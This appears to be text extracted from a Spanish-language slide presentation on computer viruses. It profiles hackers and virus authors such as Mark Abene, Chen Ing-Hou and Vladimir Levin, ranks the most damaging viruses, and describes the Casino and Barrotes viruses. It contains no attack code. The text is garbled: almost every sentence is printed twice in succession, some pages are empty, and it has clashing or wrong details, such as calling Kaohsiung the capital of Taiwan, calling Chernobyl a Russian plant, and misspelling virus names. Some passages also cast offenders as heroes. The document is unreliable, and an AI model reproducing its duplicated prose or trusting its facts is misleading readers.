En Noviembre de 1989, hizo colapsar las computadoras de En Noviembre de 1989, hizo colapsar las computadoras de WNET, uno de los principales canales de televisión de la WNET, uno de los principales canales de televisión de la ciudad de New York, dejando un mensaje "Happy Thanks ciudad de New York, dejando un mensaje "Happy Thanks giving you turkeys, from all of us at MOD" (Feliz Día de giving you turkeys, from all of us at MOD" (Feliz Día de Acción de Gracias a Uds. pavos, de parte de todos nosotros Acción de Gracias a Uds. pavos, de parte de todos nosotros en MOD). Una revista de New York lo catalogó, como "una en MOD). Una revista de New York lo catalogó, como "una de las 100 personas más inteligentes de la nación". En Julio de las 100 personas más inteligentes de la nación". En Julio de 1992, Abene y cuatro miembros de MOD fueron de 1992, Abene y cuatro miembros de MOD fueron arrestados por una serie de cargos criminales. Abene se arrestados por una serie de cargos criminales. Abene se declaró culpable de los cargos federales de acceso declaró culpable de los cargos federales de acceso desautorizado a computadoras de la compañia de teléfonos, desautorizado a computadoras de la compañia de teléfonos, incursión a computadoras y conspiración. Mark Abene pasó incursión a computadoras y conspiración. Mark Abene pasó 10 meses en la prisión del condado Schuylkill de 10 meses en la prisión del condado Schuylkill de Pennsylvania, donde recibió tantas visitas y concedió Pennsylvania, donde recibió tantas visitas y concedió entrevistas a periodistas y reporteros de canales de entrevistas a periodistas y reporteros de canales de televisión, que sus compañeros de celda los apodaron CNN. televisión, que sus compañeros de celda los apodaron CNN.

Page 61: LOS VIRUS

-CONTINUACION:-CONTINUACION:

Al negársele el uso de una computadora mientras estuvo en Al negársele el uso de una computadora mientras estuvo en prisión, Mark Abene se convirtió en un héroe muy popular. prisión, Mark Abene se convirtió en un héroe muy popular. Al salir en libertad fue empleado por su amigo Stacy Horn, Al salir en libertad fue empleado por su amigo Stacy Horn, del BBS denominado ECHO. Las hazañas de Abene le dieron del BBS denominado ECHO. Las hazañas de Abene le dieron tanta fama, que inspiraron a Michelle Slatalla y Joshua tanta fama, que inspiraron a Michelle Slatalla y Joshua Quittne a escribir un libro titulado "The Gang That Ruled Quittne a escribir un libro titulado "The Gang That Ruled Cyberspace" (La Banda que dominó el Ciberespacio). Cyberspace" (La Banda que dominó el Ciberespacio).

Page 62: LOS VIRUS

-CHEN ING-HOU:-CHEN ING-HOU:

Es el creador del virus Es el creador del virus CIHCIH, que lleva sus propias iniciales. , que lleva sus propias iniciales. Manifiesta que siente mucho por los graves daños causados Manifiesta que siente mucho por los graves daños causados porporsu creación viral, pero que ello fue motivado por una su creación viral, pero que ello fue motivado por una venganza en contra de los que llamó "incompetentes venganza en contra de los que llamó "incompetentes desarrolladores de software antivirus". Chen Ing-Hou nació desarrolladores de software antivirus". Chen Ing-Hou nació en la ciudad de Kaohsiung, Taipei o Taibei, capital y principal en la ciudad de Kaohsiung, Taipei o Taibei, capital y principal ciudad de Taiwan, y creó su famoso virus en Mayo de 1998, ciudad de Taiwan, y creó su famoso virus en Mayo de 1998, al cual denominó Chernobyl, en conmemoración del 13 al cual denominó Chernobyl, en conmemoración del 13 aniversario de la tragedia ocurrida en la planta nuclear rusa. aniversario de la tragedia ocurrida en la planta nuclear rusa. Actualmente trabaja como experto en Internet Data Actualmente trabaja como experto en Internet Data Security.Security.

Page 63: LOS VIRUS

-SIR DYSTIC:-SIR DYSTIC:

Es el hacker autor del programa original Back Orifice, Es el hacker autor del programa original Back Orifice, lanzado en 1998, da a conocer el lanzamiento de su nueva lanzado en 1998, da a conocer el lanzamiento de su nueva versión para Windows 2000 y NT. El primer lanzamiento de versión para Windows 2000 y NT. El primer lanzamiento de su sistema Back Orifice fue infectado con el virus CIH y ello su sistema Back Orifice fue infectado con el virus CIH y ello dio motivo a que Sir Dystic anunciara que desarrollaría un dio motivo a que Sir Dystic anunciara que desarrollaría un antivirus denominado CDC Protector y otro que protegería a antivirus denominado CDC Protector y otro que protegería a los sistema de los troyanos, denominado CDC Monitor. los sistema de los troyanos, denominado CDC Monitor.

Page 64: LOS VIRUS

-DAVID L .SMITH: MELISSA-DAVID L .SMITH: MELISSA

El macro virus Melissa atacó a miles de usuarios y empresas el El macro virus Melissa atacó a miles de usuarios y empresas el 26 de Marzo de 1999 , después de haber sido esparcido como 26 de Marzo de 1999 , después de haber sido esparcido como un documento de MS-Word infectado en un grupo de noticias un documento de MS-Word infectado en un grupo de noticias de Usenet , que conformaban una lista de interés sobre de Usenet , que conformaban una lista de interés sobre páginas web porno. Después de las investigaciones páginas web porno. Después de las investigaciones correspondientes se arrestó a su supuesto autor. correspondientes se arrestó a su supuesto autor. David L. Smith , de 30 años , natural de Aberdeen , New Jersey David L. Smith , de 30 años , natural de Aberdeen , New Jersey y sospechoso de ser el autor del virus Melissa se declaró y sospechoso de ser el autor del virus Melissa se declaró culpable en segundo grado de daño a computadoras el 09 de culpable en segundo grado de daño a computadoras el 09 de Diciembre de 1999. El jurado podría condenarlo a purgar una Diciembre de 1999. El jurado podría condenarlo a purgar una pena de 10 años en prisión. pena de 10 años en prisión.

Inicialmente David L. Smith , programador de computadoras , Inicialmente David L. Smith , programador de computadoras , alegó su inocencia y manifestó que creó el virus en su alegó su inocencia y manifestó que creó el virus en su departamento de Aberdeen y lo llamó así en memoria de una departamento de Aberdeen y lo llamó así en memoria de una bailarina Topless , del estado de Florida , de la cual se había bailarina Topless , del estado de Florida , de la cual se había enamorado , pero sus relaciones sentimentales quedaron enamorado , pero sus relaciones sentimentales quedaron frustradas. frustradas.

Page 65: LOS VIRUS

-CONTINUACION:-CONTINUACION:

Inicialmente David L. Smith , programador de Inicialmente David L. Smith , programador de computadoras , alegó su inocencia y manifestó que creó el computadoras , alegó su inocencia y manifestó que creó el virus en su departamento de Aberdeen y lo llamó así en virus en su departamento de Aberdeen y lo llamó así en memoria de una bailarina Topless , del estado de Florida , de memoria de una bailarina Topless , del estado de Florida , de la cual se había enamorado , pero sus relaciones la cual se había enamorado , pero sus relaciones sentimentales quedaron frustradas. sentimentales quedaron frustradas.

Page 66: LOS VIRUS

-REONEL RAMONES:-REONEL RAMONES:

De 27 años, empleado bancario, quien vivía con su hermana De 27 años, empleado bancario, quien vivía con su hermana y su novia Irene de Guzmán de 23, fueron acusados de ser y su novia Irene de Guzmán de 23, fueron acusados de ser los autores del virus Love Letter, el mismo que según los autores del virus Love Letter, el mismo que según algunas evidencias, habría empezado como un conjunto de algunas evidencias, habría empezado como un conjunto de rutinas para penetrar en otros sistemas, con el objeto de rutinas para penetrar en otros sistemas, con el objeto de sustraer la información de tarjetas de crédito de terceros. sustraer la información de tarjetas de crédito de terceros. Las evidencias apuntaron a Reonel Ramonez, como cabeza Las evidencias apuntaron a Reonel Ramonez, como cabeza del grupo que participó en la creación y difusión de este del grupo que participó en la creación y difusión de este virus. Una corporación holandesa lo contrató con un sueldo virus. Una corporación holandesa lo contrató con un sueldo muy atractivo, por considerarlo muy hábil y capaz en el muy atractivo, por considerarlo muy hábil y capaz en el desarrollo de sistemas de seguridad en Redes e Internet.desarrollo de sistemas de seguridad en Redes e Internet.

Page 67: LOS VIRUS

-VLADIMIR LEVIN:-VLADIMIR LEVIN:

Graduado en matemáticas de la Universidad Tecnológica de Graduado en matemáticas de la Universidad Tecnológica de San Petesburgo, Rusia, fue acusado y preso por la Interpol San Petesburgo, Rusia, fue acusado y preso por la Interpol después de meses de investigación por ser la mente después de meses de investigación por ser la mente maestra de una serie de fraudes tecnológicos que le maestra de una serie de fraudes tecnológicos que le permitieron a él y la banda que conformaba, substraer más permitieron a él y la banda que conformaba, substraer más de 10 millones de dólares, de cuentas corporativas del de 10 millones de dólares, de cuentas corporativas del Citibank. Insiste en la idea de que uno de los abogados Citibank. Insiste en la idea de que uno de los abogados contratado para defenderlo es, en verdad, un agente del FBI. contratado para defenderlo es, en verdad, un agente del FBI. A pesar de que la banda substrajo más de 10 millones de A pesar de que la banda substrajo más de 10 millones de dólares al Citibank, Levin fue sentenciado a 3 años de dólares al Citibank, Levin fue sentenciado a 3 años de prisión y a pagar la suma de US $ 240,015 a favor del prisión y a pagar la suma de US $ 240,015 a favor del Citibank, ya que las compañías de seguros habían cubierto Citibank, ya que las compañías de seguros habían cubierto los montos de las corporaciones agraviadas.los montos de las corporaciones agraviadas.

Page 68: LOS VIRUS

-CONTINUACION:-CONTINUACION:

Los técnicos tuvieron que mejorar sus sistemas de seguridad Los técnicos tuvieron que mejorar sus sistemas de seguridad contra "crackers" y Vladimir Levin ahora se encuentra en contra "crackers" y Vladimir Levin ahora se encuentra en libertad. libertad.

El grupo Matrix, también autodenominado MATRIX4EVER El grupo Matrix, también autodenominado MATRIX4EVER (Matrix por siempre) y el grupo Coderz, ambos agrupan a (Matrix por siempre) y el grupo Coderz, ambos agrupan a hackers de diferentes nacionalidades y cuyos seudónimos hackers de diferentes nacionalidades y cuyos seudónimos son: ANAkToS de Grecia, Del_Armg0 de Francia, Cell de los son: ANAkToS de Grecia, Del_Armg0 de Francia, Cell de los Estados Unidos, mort de la república Checa, NBK de Brasil, Estados Unidos, mort de la república Checa, NBK de Brasil, pointbat de Francia, jackie de Austria, SankeByte de pointbat de Francia, jackie de Austria, SankeByte de Alemania y ULTRAS de Rusia.Alemania y ULTRAS de Rusia.NBK es originario de Río de Janeiro, Brasil, y destaca en NBK es originario de Río de Janeiro, Brasil, y destaca en estos grupos por ser el autor de las librerías Invictus, que el estos grupos por ser el autor de las librerías Invictus, que el 20 de Octubre del 2001 emitió su versión 2.0 y con la cual 20 de Octubre del 2001 emitió su versión 2.0 y con la cual se generan gusanos y troyanos que infectan los PE (Portable se generan gusanos y troyanos que infectan los PE (Portable Executable). Executable).

Page 69: LOS VIRUS
Page 70: LOS VIRUS

-ROBERT ¨PIMPSHIZ¨ LYTTLE:-ROBERT ¨PIMPSHIZ¨ LYTTLE:

De 18 años de edad, se encuentra bajo arresto De 18 años de edad, se encuentra bajo arresto domiciliario, por orden de una Corte Juvenil de domiciliario, por orden de una Corte Juvenil de ciudad Martinez, estado de California, acusado ciudad Martinez, estado de California, acusado de ser uno de los miembros del grupo de ser uno de los miembros del grupo Deceptive Duo, que probadamente Deceptive Duo, que probadamente incursionaron ilegalmente y substrajeron incursionaron ilegalmente y substrajeron información de los servidores del sistema de la información de los servidores del sistema de la Federal Aviation Administration de los Estados Federal Aviation Administration de los Estados Unidos y descargaron información confidencial Unidos y descargaron información confidencial relacionada a las filmaciones de las actividades relacionada a las filmaciones de las actividades de los pasajeros de los aeropuertos. de los pasajeros de los aeropuertos.

Page 71: LOS VIRUS

-CONTINUACION:-CONTINUACION:

Al momento de su arresto Lyttle portaba una portátil IBM Al momento de su arresto Lyttle portaba una portátil IBM ThinkPad, un lector de huellas digitales del dedo pulgar y ThinkPad, un lector de huellas digitales del dedo pulgar y otros sofisticados dispositivos "The Deceptive Duo" (El dúo otros sofisticados dispositivos "The Deceptive Duo" (El dúo engañoso) ingresaron a un servidor de la FAA, empleado por engañoso) ingresaron a un servidor de la FAA, empleado por la administración de Seguridad de la Aviación Civil de los la administración de Seguridad de la Aviación Civil de los Estados Unidos, encargada a partir de los fatídicos Estados Unidos, encargada a partir de los fatídicos incidentes del pasado 11 de Septiembre del 2001, del incidentes del pasado 11 de Septiembre del 2001, del monitoreo de las actividades de los pasajeros en todos los monitoreo de las actividades de los pasajeros en todos los aeropuertos de ese país. aeropuertos de ese país. Cada sitio web incursionado por estos hackers, mostraba Cada sitio web incursionado por estos hackers, mostraba una supuesta "patriótica misión" en la cual preconizaban ser una supuesta "patriótica misión" en la cual preconizaban ser ciudadanos de los Estados Unidos de América, determinados ciudadanos de los Estados Unidos de América, determinados a salvar al país de una "amenaza extranjera" al exponer los a salvar al país de una "amenaza extranjera" al exponer los huecos de inseguridad en Internet. Incluso incluyeron el logo huecos de inseguridad en Internet. Incluso incluyeron el logo del grupo, consistente en dos armas de fuego delante de del grupo, consistente en dos armas de fuego delante de una bandera norteamericana. una bandera norteamericana.

Page 72: LOS VIRUS

-CONTINUACION:-CONTINUACION:

Cabe mencionar que Robert Lyttle, siendo un joven Cabe mencionar que Robert Lyttle, siendo un joven adolescente, de apenas 14 años formó la corporación Sub-adolescente, de apenas 14 años formó la corporación Sub-Seven Software, que desarrolló herramientas tales como el Seven Software, que desarrolló herramientas tales como el Troyano buscador de puertos Sub-Net, el desinstalador Troyano buscador de puertos Sub-Net, el desinstalador Uninstall it Pro y Define, entre otros y que muchos usuarios Uninstall it Pro y Define, entre otros y que muchos usuarios consideramos de gran utilidad. consideramos de gran utilidad. Posiblemente se convierta en un héroe del "underground" en Posiblemente se convierta en un héroe del "underground" en el ciber-espacio. En Febrero del 2002 descubrió una el ciber-espacio. En Febrero del 2002 descubrió una vulnerabilidad en el AOL Instant Messenger, y mucho antes vulnerabilidad en el AOL Instant Messenger, y mucho antes hizo lo propio con varios sistemas de Microsoft. hizo lo propio con varios sistemas de Microsoft.

Page 73: LOS VIRUS

-EL GRAN OSCARIN:-EL GRAN OSCARIN:

Hacker español de 27 años, autor del troyano Cabronator, Hacker español de 27 años, autor del troyano Cabronator, las iniciales son O.L.H y que en los primeros días de Abril del las iniciales son O.L.H y que en los primeros días de Abril del 2003 fue detenido por la Guardia Civil de Española, en un 2003 fue detenido por la Guardia Civil de Española, en un operativo denominado CLON que se inició en Agosto del operativo denominado CLON que se inició en Agosto del 2002. Su impresionante ego está casi a la par con sus 2002. Su impresionante ego está casi a la par con sus prolíficas creaciones de todas sus herramientas de hacking y prolíficas creaciones de todas sus herramientas de hacking y cracking, virus, juegos obscenos, etc. cracking, virus, juegos obscenos, etc.

Page 74: LOS VIRUS

-TSUTMOTO SHIMOMURA:-TSUTMOTO SHIMOMURA:

Shimomura buscó lo encontró y desenmascaro a Kevin Shimomura buscó lo encontró y desenmascaro a Kevin Mitnick, el cracker/phreaker más famoso de USA, a Mitnick, el cracker/phreaker más famoso de USA, a principios de 1994. Después de que sus colegas del "San principios de 1994. Después de que sus colegas del "San Diego Supercomputing Center" le informaron a Shimomura Diego Supercomputing Center" le informaron a Shimomura que alguien había robado centenares de programas y los que alguien había robado centenares de programas y los ficheros de su estación de trabajo, el experto en seguridad ficheros de su estación de trabajo, el experto en seguridad computacional Tsutomu trabajó en extremo para seguir al computacional Tsutomu trabajó en extremo para seguir al ladrón a través del "WELL". Un rastro del "telco labyrinthine" ladrón a través del "WELL". Un rastro del "telco labyrinthine" lo condujo eventualmente a un complejo en Raleigh, N.C lo condujo eventualmente a un complejo en Raleigh, N.C donde más tarde los agentes de FBI arrestarían a Mitnick en donde más tarde los agentes de FBI arrestarían a Mitnick en

su departamento.su departamento.

Page 75: LOS VIRUS

3.4-LOS 10 VIRUS MAS 3.4-LOS 10 VIRUS MAS DAÑINOS DE LA HISTORIA:DAÑINOS DE LA HISTORIA: CIH (1998)CIH (1998) Daño estimado:Daño estimado: 20 a 80 millones de dólares, sin contar el 20 a 80 millones de dólares, sin contar el

precio de la información destruida.precio de la información destruida.

Localización:Localización: Desde Taiwan Junio de 1998, CHI es reconocido Desde Taiwan Junio de 1998, CHI es reconocido como uno de los mas peligrosos y destructivos virus jamás como uno de los mas peligrosos y destructivos virus jamás vistos. El virus infectó los archivos ejecutables de Windows vistos. El virus infectó los archivos ejecutables de Windows 95,98 y ME y fué capaz de permanecer residente en 95,98 y ME y fué capaz de permanecer residente en memoria de los ordenadores infectados para así infectar memoria de los ordenadores infectados para así infectar otros ejecutables.otros ejecutables.

¿Porqué?:¿Porqué?: Lo que lo hizo tan peligroso fué que en poco Lo que lo hizo tan peligroso fué que en poco tiempo afectó muchos ordenadores, podía reescribir datos tiempo afectó muchos ordenadores, podía reescribir datos en el disco duro y dejarlo inoperativo.en el disco duro y dejarlo inoperativo.

Curiosidades:Curiosidades: CIH fué distribuido en algun que otro CIH fué distribuido en algun que otro importante software como un Demo del juego de Activision importante software como un Demo del juego de Activision "Sin"."Sin".

Page 76: LOS VIRUS

-MELISSA (1999):-MELISSA (1999):

Daño Estimado:Daño Estimado: 300 a 600 millones de dólares 300 a 600 millones de dólares

Localización:Localización: Un Miercoles 26 de Marzo de 1999, Un Miercoles 26 de Marzo de 1999, W97M/Melissa llegó a ser portada de muchos rotativos W97M/Melissa llegó a ser portada de muchos rotativos alrededor del mundo. Una estimación asegura que este alrededor del mundo. Una estimación asegura que este script afecto del 15% a 20% de los ordenadores del mundo.script afecto del 15% a 20% de los ordenadores del mundo.

CuriosidadesCuriosidades: El virus usó Microsoft Outlook para enviarse : El virus usó Microsoft Outlook para enviarse asimismo a 50 de los usuarios de la lista de contactos. El asimismo a 50 de los usuarios de la lista de contactos. El mensaje contenía la frase, "Here is that document you asked mensaje contenía la frase, "Here is that document you asked for...don't show anyone else. ;-)," y venía acompañado por for...don't show anyone else. ;-)," y venía acompañado por un documento Word adjunto, el cual fue ejecutado por miles un documento Word adjunto, el cual fue ejecutado por miles de usuarios y permitieron al virus infectar los ordenadores y de usuarios y permitieron al virus infectar los ordenadores y propagarse a traves de la red.propagarse a traves de la red.

Page 77: LOS VIRUS

¨ I LOVE YOU ¨¨ I LOVE YOU ¨

Daño Estimado:Daño Estimado: 10 a 15 billones de dólares 10 a 15 billones de dólares

Localización:Localización: Tambien conocido como "Loveletter" y "Love Tambien conocido como "Loveletter" y "Love Bug", este fue un script de Visual Basic con un ingenioso y Bug", este fue un script de Visual Basic con un ingenioso y irresistible caramelo: Promesas de amor. Un 3 de Mayo de irresistible caramelo: Promesas de amor. Un 3 de Mayo de 2000, el gusano ILOVEYOU fue detectado en HONG KONG y fué 2000, el gusano ILOVEYOU fue detectado en HONG KONG y fué transmitido via email con el asunto "ILOVEYOU" y el archivo transmitido via email con el asunto "ILOVEYOU" y el archivo adjunto, Love-Letter-For-You.TXT.vbsadjunto, Love-Letter-For-You.TXT.vbsDe igual manera a Melissa se transmitio a todos los contactos De igual manera a Melissa se transmitio a todos los contactos de Microsoft Outlook.de Microsoft Outlook.

¿Porqué?:¿Porqué?: Miles de usuario fueron seducidos por el asunto y Miles de usuario fueron seducidos por el asunto y clickearon en el adjunto infectado. El virus tambien se tomó la clickearon en el adjunto infectado. El virus tambien se tomó la libertad de sobrescribir archivos de musica, imágenes y otros.libertad de sobrescribir archivos de musica, imágenes y otros.

Curiosidades:Curiosidades: Como Filipinas no tenía leyes que hablaran sobre Como Filipinas no tenía leyes que hablaran sobre la escritura de virus el autor de ILOVEYOU quedó sin cargos.la escritura de virus el autor de ILOVEYOU quedó sin cargos.

Page 78: LOS VIRUS

-RED CODE:-RED CODE:

Daño Estimado:Daño Estimado: 2.6 billones de dólares 2.6 billones de dólares

Localización:Localización: Code Red fue un gusano que infecto Code Red fue un gusano que infecto ordenadores por primera vez el 13 de Julio de 2001. Fue un ordenadores por primera vez el 13 de Julio de 2001. Fue un virulento bug porque su objetivo era atacar a ordenadores virulento bug porque su objetivo era atacar a ordenadores que tuvieran el servidor (IIS) Microsoft's Internet Information que tuvieran el servidor (IIS) Microsoft's Internet Information Server. El gusano era capaz de explotar una importante Server. El gusano era capaz de explotar una importante vulnerabilidad de este servidor.vulnerabilidad de este servidor.

Curiosidades:Curiosidades: Tambien conocido como "Bady", Code Red fue Tambien conocido como "Bady", Code Red fue diseñado para el maximo daño posible. En menos de una diseñado para el maximo daño posible. En menos de una semana infectó casi 400.000 servidores y mas de un semana infectó casi 400.000 servidores y mas de un 1.000.000 en su corta historia.1.000.000 en su corta historia.

Page 79: LOS VIRUS

-SQL SLAMMER:-SQL SLAMMER:

Daño Estimado:Daño Estimado: Como SQL Slammer apareció un sábado Como SQL Slammer apareció un sábado su daño ecónomico fue bajo. Sin embargo este atacó su daño ecónomico fue bajo. Sin embargo este atacó 500.000 servidores.500.000 servidores.

Curiosidades:Curiosidades: SQL Slammer, tambien conocido como SQL Slammer, tambien conocido como "Sapphire", data del 25 de Enero de 2003 y su principal "Sapphire", data del 25 de Enero de 2003 y su principal objetivo son servidores, el virus era un archivo de 376-byte objetivo son servidores, el virus era un archivo de 376-byte que generaba una dirección Ip de manera aleatoria y se que generaba una dirección Ip de manera aleatoria y se enviaba asimismoa estas IPs. Si la IP corría bajo un enviaba asimismoa estas IPs. Si la IP corría bajo un Microsoft's SQL Server Desktop Engine sin parchear podía Microsoft's SQL Server Desktop Engine sin parchear podía enviarse de nuevo a otras IPs de manera aleatoria.enviarse de nuevo a otras IPs de manera aleatoria.Slammer infectó 75,000 ordenadores en 10 minutos.Slammer infectó 75,000 ordenadores en 10 minutos.

Page 80: LOS VIRUS

-BLASTER:-BLASTER:

Daño Estimado:Daño Estimado: 2 a 10 billones de dolares, cientos de 2 a 10 billones de dolares, cientos de miles de ordenadores infectados.miles de ordenadores infectados.

Localización:Localización: El verano de 2003 se dió a conocer Blaster El verano de 2003 se dió a conocer Blaster tambien llamado "Lovsan" o "MSBlast".tambien llamado "Lovsan" o "MSBlast".El virus se detectó un 11 de Agosto y se propagó El virus se detectó un 11 de Agosto y se propagó rapidamente, en sólo dos días. Transmitio gracias a una rapidamente, en sólo dos días. Transmitio gracias a una vulnerabilidad en Windows 2000 y Windows XP, y cuando vulnerabilidad en Windows 2000 y Windows XP, y cuando era activado abría un cuadro de diálogo en el cual el era activado abría un cuadro de diálogo en el cual el apagado del sistema era inminente.apagado del sistema era inminente.

Curiosidades:Curiosidades: Oculto en el codigo de MSBLAST .EXE había Oculto en el codigo de MSBLAST .EXE había unos curiosos mensajes:unos curiosos mensajes:

"Solo quiero decir que te quiero san!!" y "billy gates ¿Porqué "Solo quiero decir que te quiero san!!" y "billy gates ¿Porqué haces posible esto? para de hacer dinero y arregla tu haces posible esto? para de hacer dinero y arregla tu software!!"software!!"

Page 81: LOS VIRUS
Page 82: LOS VIRUS

-SABIG. F:-SABIG. F:

Daño Estimado:Daño Estimado: De 5 a 10 billones de dólares y más De 5 a 10 billones de dólares y más de un millón de ordenadores infectados.de un millón de ordenadores infectados.

Localización:Localización: Sobig tambien atacó en Agosto de 2003 Sobig tambien atacó en Agosto de 2003 un horrible mes en materia de seguridad. La variante un horrible mes en materia de seguridad. La variante mas destructiva de este gusano fué Sobig.F, que atacó mas destructiva de este gusano fué Sobig.F, que atacó el 19 de Agosto generando mas de 1 millón de copias el 19 de Agosto generando mas de 1 millón de copias de él mismo en las primeras 24 horas.de él mismo en las primeras 24 horas.

Curiosidades:Curiosidades: El virus se propagó vía e-mail adjunto El virus se propagó vía e-mail adjunto archivos como application.pif y thank_you.pif. Cuando archivos como application.pif y thank_you.pif. Cuando se activaba se transmitía.se activaba se transmitía.El 10 de Septiembre de 2003 el virus se desactivó El 10 de Septiembre de 2003 el virus se desactivó asimismo y ya no resultaba una amenaza, Microsoft asimismo y ya no resultaba una amenaza, Microsoft ofreció en su día 250.000$ a aquel que identificara a ofreció en su día 250.000$ a aquel que identificara a su autor.su autor.

Page 83: LOS VIRUS

-BAGLE:-BAGLE:

Daño Estimado:Daño Estimado: 10 millones de dólares y subiendo... 10 millones de dólares y subiendo...

Localización:Localización: Bagle es un sofisticado gusano que hizó su Bagle es un sofisticado gusano que hizó su debut el 18 de Enero de 2004.debut el 18 de Enero de 2004.El código infectaba los sistemas con un mecanismo El código infectaba los sistemas con un mecanismo tradicional, adjuntando archivos a un mail y propagandose tradicional, adjuntando archivos a un mail y propagandose el mismo.el mismo.El peligro real de Bagle es que existen de 60 a 100 variantes El peligro real de Bagle es que existen de 60 a 100 variantes de él, cuando el gusano infectaba un ordenador abría un de él, cuando el gusano infectaba un ordenador abría un puerto TCP que era usado remotamente por una aplicación puerto TCP que era usado remotamente por una aplicación para acceder a los datos del sistema.para acceder a los datos del sistema.

Curiosidades:Curiosidades: La variante Bagle.B fue diseñada para La variante Bagle.B fue diseñada para detenerse el 28 de Enero de 2004 pero otras numerosas detenerse el 28 de Enero de 2004 pero otras numerosas variantes del virus siguen funcionando.variantes del virus siguen funcionando.

Page 84: LOS VIRUS

-MY DOOM:-MY DOOM:

Daño Estimado:Daño Estimado: Realentizo el rendimiento de internet en Realentizo el rendimiento de internet en un 10% y la carga de páginas en un 50%.un 10% y la carga de páginas en un 50%.

Localización:Localización: Durante unas pocas horas del 26 de Enero de Durante unas pocas horas del 26 de Enero de 2004, MyDoom dió la vuelta al mundo. Era transmitido vía 2004, MyDoom dió la vuelta al mundo. Era transmitido vía mail enviando un supuesto mensaje de error aunque mail enviando un supuesto mensaje de error aunque tambien atacó a carpetas compartidas de usuarios de la red tambien atacó a carpetas compartidas de usuarios de la red Kazaa.Kazaa.

Curiosidades:Curiosidades: MyDoom estaba programado para detenerse MyDoom estaba programado para detenerse despues del 12 de Febrero de 2004despues del 12 de Febrero de 2004

Page 85: LOS VIRUS

-SASSER:-SASSER:

Daño Estimado:Daño Estimado: 10 millones de dólares 10 millones de dólares

Localización:Localización: 30 de Abril de 2004 fué su fecha de 30 de Abril de 2004 fué su fecha de lanzamiento y fue suficientemente destructivo como para lanzamiento y fue suficientemente destructivo como para colgar algunas comunicaciones satelites de agencia colgar algunas comunicaciones satelites de agencia francesas.francesas.Tambien consiguió cancelar vuelos de numeros compañias Tambien consiguió cancelar vuelos de numeros compañias aéreas.aéreas.

Curiosidades:Curiosidades: Sasser no era transmitido vía mail y no Sasser no era transmitido vía mail y no requería usuarios para propagarse. Cada vez que el gusano requería usuarios para propagarse. Cada vez que el gusano encontraba sistemas Windows 2000 y Windows Xp no encontraba sistemas Windows 2000 y Windows Xp no actualizados este era replicado, los sistemas infectados actualizados este era replicado, los sistemas infectados experimentaban una gran inestabilidad.experimentaban una gran inestabilidad.

Page 86: LOS VIRUS

3.5-VIRUS CURIOSOS:3.5-VIRUS CURIOSOS:

CASSINOCASSINO Uno de los virus más cabroncetes de la historia. El virus se Uno de los virus más cabroncetes de la historia. El virus se

activa los días 15 de enero, 15 de abril y 15 de agosto, activa los días 15 de enero, 15 de abril y 15 de agosto, mostrando el siguiente mensaje en pantalla:mostrando el siguiente mensaje en pantalla:

DESTRUCTOR de DISCO. UN RECUERDO DE MALTA DESTRUCTOR de DISCO. UN RECUERDO DE MALTA ¡Acabo de DESTRUIR la FAT de tu Disco!¡Acabo de DESTRUIR la FAT de tu Disco!

Sin embargo, tengo una copia en RAM, y voy a darte una Sin embargo, tengo una copia en RAM, y voy a darte una última oportunidadúltima oportunidadde restaurar tus preciosos datos.de restaurar tus preciosos datos.SI REINICIAS AHORA, TODOS TUS DATOS SE BORRARÁN - SI REINICIAS AHORA, TODOS TUS DATOS SE BORRARÁN - ¡PARA SIEMPRE!: PELIGRO¡PARA SIEMPRE!: PELIGROTus datos dependen de una partida de JACKPOTTus datos dependen de una partida de JACKPOT

CASINO DE MALTE JACKPOTCASINO DE MALTE JACKPOT 5 : CREDITOS5 : CREDITOS LLL = Tu DiscoLLL = Tu Disco

??? = Mi número de teléfono??? = Mi número de teléfono CUALQUIER TECLA PARA JUGAR CUALQUIER TECLA PARA JUGAR

Page 87: LOS VIRUS
Page 88: LOS VIRUS

-CONTINUACION:-CONTINUACION:

El virus borraba la El virus borraba la FATFAT, estructura básica de cualquier disco , estructura básica de cualquier disco DOS que permite encontrar los datos. Sin embargo, según DOS que permite encontrar los datos. Sin embargo, según indicaba en el mensaje, había guardado una copia de indicaba en el mensaje, había guardado una copia de seguridad en memoria que el usuario podía recuperar si seguridad en memoria que el usuario podía recuperar si ganaba la partida. Y entonces daba comienzo una partida de ganaba la partida. Y entonces daba comienzo una partida de tragaperras en la que nos jugabamos los datos de nuestro tragaperras en la que nos jugabamos los datos de nuestro disco duro. Si conseguíamos sacar tres “L”, podíamos disco duro. Si conseguíamos sacar tres “L”, podíamos respirar tranquilos. El virus restauraba los datos y se respirar tranquilos. El virus restauraba los datos y se despedía con el siguiente mensaje:despedía con el siguiente mensaje:

¡BASTARDO! HAS TENIDO SUERTE ESTA VEZ, PERO POR TU¡BASTARDO! HAS TENIDO SUERTE ESTA VEZ, PERO POR TUPROPIA SEGURIDAD, ¡APAGA TU ORDENADOR AHORA Y NO PROPIA SEGURIDAD, ¡APAGA TU ORDENADOR AHORA Y NO LO ENCIENDAS HASTA MAÑANA! LO ENCIENDAS HASTA MAÑANA!

Y si no conseguíamos las tres “L”… bueno… digamos que Y si no conseguíamos las tres “L”… bueno… digamos que esa será la última partida que jugaremos en ese ordenador.esa será la última partida que jugaremos en ese ordenador.

Page 89: LOS VIRUS

VIRUS ¨ BARROTES ¨VIRUS ¨ BARROTES ¨

Este es un virus de la vieja escuela. Un auténtico clásico que Este es un virus de la vieja escuela. Un auténtico clásico que todos los que tuvieran ordenador antes de 1993 seguro que todos los que tuvieran ordenador antes de 1993 seguro que recordarán. En aquel entonces, este tipo de programas se recordarán. En aquel entonces, este tipo de programas se transmitían a través de diskettes infectados o bien de las transmitían a través de diskettes infectados o bien de las primitivas BBS, por lo que normalmente cuando alguien primitivas BBS, por lo que normalmente cuando alguien “pillaba” el virus, todos sus amigos solían contagiarse. Su “pillaba” el virus, todos sus amigos solían contagiarse. Su principal vía de propagación era, por tanto, el intercambio de principal vía de propagación era, por tanto, el intercambio de juegos piratas.juegos piratas.

Barrotes no era un virus especialmente dañino, pero si muy Barrotes no era un virus especialmente dañino, pero si muy llamativo. Cuando lo pillabas, enseguida te dabas cuenta. El llamativo. Cuando lo pillabas, enseguida te dabas cuenta. El virus era un pequeño programa que, al entrar en un nuevo virus era un pequeño programa que, al entrar en un nuevo sistema, buscaba y escribía su código en los archivos .COM sistema, buscaba y escribía su código en los archivos .COM y .EXE de MS-DOS (archivos ejecutables)y .EXE de MS-DOS (archivos ejecutables)

. . Una vez hecha la jugarreta, el virus permanecía en estado Una vez hecha la jugarreta, el virus permanecía en estado

latente hasta el 5 de Enero, momento en que se activaba latente hasta el 5 de Enero, momento en que se activaba sobreescribiendo el sector de arranque del disco duro. sobreescribiendo el sector de arranque del disco duro.

